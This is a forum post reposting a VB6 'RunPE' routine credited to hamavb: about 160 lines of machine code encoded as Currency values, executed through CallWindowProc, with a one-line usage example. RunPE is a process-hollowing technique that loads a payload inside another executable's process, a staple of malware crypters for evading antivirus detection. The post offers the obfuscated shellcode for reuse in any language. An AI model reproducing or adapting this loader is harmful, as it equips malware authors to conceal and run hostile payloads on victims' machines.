Jump to content
Nytro

[VB6] shRunpe [fully standalone Runpe shellcode] --by hamavb

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[VB6] shRunpe [fully standalone Runpe shellcode] --by hamavb

Author:

[h=3]hamavb[/h]

As the title says, this's a fully standalone Runpe shellcode (i assume that you know what Runpe is.

if not, try google it then come back and read this thread).

and ofcorse the shellcode can be used in any programming language, you just have to convert it.

'Author : hamavb
'First cut : 02/03/2012 16:50
'Credits : karcrack & cobein
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
        Dim Asm(160) As Currency
        Asm(0) = 3011782251321.1488@
        Asm(1) = 2842944510165.0021@
        Asm(2) = 21475170.7244@
        Asm(3) = 3039972698908.2734@
        Asm(4) = 0.0108@
        Asm(5) = 0@
        Asm(6) = 0@
        Asm(7) = 0@
        Asm(8) = 0@
        Asm(9) = 0@
        Asm(10) = 770918988510973.1328@
        Asm(11) = 609196292101137.4146@
        Asm(12) = 318076019310180.1508@
        Asm(13) = -857485367476117.5446@
        Asm(14) = 399392180.8913@
        Asm(15) = -706833318868351.5511@
        Asm(16) = 6879439133396.1731@
        Asm(17) = 763810498335316.3776@
        Asm(18) = 388654513.6166@
        Asm(19) = 98506041997.169@
        Asm(20) = 24964196938431.9488@
        Asm(21) = 22034984796.16@
        Asm(22) = 305625529718164.0704@
        Asm(23) = -410459675325501.5192@
        Asm(24) = -172419915909691.6991@
        Asm(25) = 150655457759015.8157@
        Asm(26) = 763810498295053.1535@
        Asm(27) = -334758189796557.4082@
        Asm(28) = 763810498175933.6042@
        Asm(29) = 769693235337619.0272@
        Asm(30) = 658651445508203.5218@
        Asm(31) = 93228415366.4744@
        Asm(32) = 337544363.4688@
        Asm(33) = -171181400105556.1333@
        Asm(34) = -43143787013419.7499@
        Asm(35) = -843073848963811.6758@
        Asm(36) = 586115344006226.9449@
        Asm(37) = 81903309047.8335@
        Asm(38) = -170655782147139.7888@
        Asm(39) = -296106572219468.926@
        Asm(40) = -171744351251070.9758@
        Asm(41) = 478565684273270.0365@
        Asm(42) = 766128157362243.3@
        Asm(43) = 763822153521118.6688@
        Asm(44) = -5798494293561.088@
        Asm(45) = 292876624.968@
        Asm(46) = -303308424893800.028@
        Asm(47) = 18687314406408.1922@
        Asm(48) = -814921249263117.9264@
        Asm(49) = 377936345376908.9026@
        Asm(50) = 914455950214871.0911@
        Asm(51) = 793381819255881.7282@
        Asm(52) = 247979454486563.4385@
        Asm(53) = -842580059571706.7544@
        Asm(54) = 261953043.9225@
        Asm(55) = 1351124663940.1355@
        Asm(56) = -5728895679889.4336@
        Asm(57) = 16435523184027.2177@
        Asm(58) = 453291086712582.9632@
        Asm(59) = -171181401297649.6638@
        Asm(60) = 247984901789109.5093@
        Asm(61) = 763853927511347.5304@
        Asm(62) = 68764336814004.0238@
        Asm(63) = 377880083361326.677@
        Asm(64) = 58153857883.8015@
        Asm(65) = -170634502550313.984@
        Asm(66) = -6846382739763.962@
        Asm(67) = 217285200.5584@
        Asm(68) = 273152312385105.8024@
        Asm(69) = 13733354816300.6466@
        Asm(70) = 764000768607145.1648@
        Asm(71) = 17395153563837.4458@
        Asm(72) = -353751767489869.7902@
        Asm(73) = 763363.3281@
        Asm(74) = 392094642558210.6624@
        Asm(75) = 764766522162398.7432@
        Asm(76) = 126410412043612.3678@
        Asm(77) = 27351427555.8027@
        Asm(78) = 11706747011255.5776@
        Asm(79) = -757276053642969.088@
        Asm(80) = 360268856045024.0513@
        Asm(81) = 749398978656993.7514@
        Asm(82) = 12354147786351.6251@
        Asm(83) = 769693219347778.7648@
        Asm(84) = 414640788194904.6822@
        Asm(85) = -171181417231738.2261@
        Asm(86) = 276807880992725.4373@
        Asm(87) = -842805239553082.2424@
        Asm(88) = 37043291672.0721@
        Asm(89) = 507392545273423.744@
        Asm(90) = 769258247064186.1864@
        Asm(91) = 68764336812483.5886@
        Asm(92) = 360268875651665.0832@
        Asm(93) = 749398978495932.017@
        Asm(94) = 9651988025294.3009@
        Asm(95) = 769693219347778.7648@
        Asm(96) = 126410412042563.7942@
        Asm(97) = -171294008471547.0205@
        Asm(98) = -387449256181707.5451@
        Asm(99) = 363299752439103.6175@
        Asm(100) = -410459675325517.2888@
        Asm(101) = -172926570866094.7199@
        Asm(102) = -635688100489173.3787@
        Asm(103) = 763810497261576.6376@
        Asm(104) = 126410412042144.3634@
        Asm(105) = -843073849903335.4646@
        Asm(106) = 769693215773368.7817@
        Asm(107) = 414640788193698.8194@
        Asm(108) = 4951342415221.7475@
        Asm(109) = 4636260512845.0048@
        Asm(110) = -171631782205882.368@
        Asm(111) = 507388721888441.1549@
        Asm(112) = 31815578412492.9256@
        Asm(113) = -872572382190820.8041@
        Asm(114) = -286501654647065.8048@
        Asm(115) = -428658242031485.5343@
        Asm(116) = 3149895693349.6588@
        Asm(117) = 22752143878461.8496@
        Asm(118) = 10655039450.0177@
        Asm(119) = 19434514006.2976@
        Asm(120) = 2249161163731.9936@
        Asm(121) = 590215178835617.3824@
        Asm(122) = -171519195984216.1688@
        Asm(123) = 334471606820667.3981@
        Asm(124) = -6937148713125.7624@
        Asm(125) = 3006614124114.7186@
        Asm(126) = 457802337043140.7336@
        Asm(127) = 34749504.673@
        Asm(128) = -843073850212036.239@
        Asm(129) = 536232810004781.4409@
        Asm(130) = 699902812802672.356@
        Asm(131) = -439434742750697.5805@
        Asm(132) = 756604737376275.6714@
        Asm(133) = 869968633553.1604@
        Asm(134) = 450404738465.792@
        Asm(135) = -7194094211452.1344@
        Asm(136) = -1353710065018.4752@
        Asm(137) = -439079356974065.2545@
        Asm(138) = 566676858034822.4232@
        Asm(139) = 32602016.4622@
        Asm(140) = -7089160921751.4365@
        Asm(141) = 410061545662244.4496@
        Asm(142) = 617979275378688@
        Asm(143) = 725985904952471.1762@
        Asm(144) = 854193482151915.9435@
        Asm(145) = -842159216757581.13@
        Asm(146) = 457592490565246.7766@
        Asm(147) = 17684902147728.7019@
        Asm(148) = 643884385768544.0491@
        Asm(149) = 622040492439682.185@
        Asm(150) = 842553683379673.7879@
        Asm(151) = 865826324060815.6483@
        Asm(152) = 233132869356380.6979@
        Asm(153) = -841594865717950.1309@
        Asm(154) = -598169487549740.1085@
        Asm(155) = 22006038477175.2068@
        Asm(156) = 843978581769276.108@
        Asm(157) = -840178504924852.7391@
        Asm(158) = -836852911227146.7764@
        Asm(159) = 643884385767650.3812@
        Asm(160) = 328436.0538@
        CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
End Function

Usage example :

ShRunPE "Target Exe Path", "PE data as byte()"

Sursa: http://www.hackhound.org/forum/topic/43748-shrunpe-fully-standalone-runpe-shellcode-by-hamavb/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...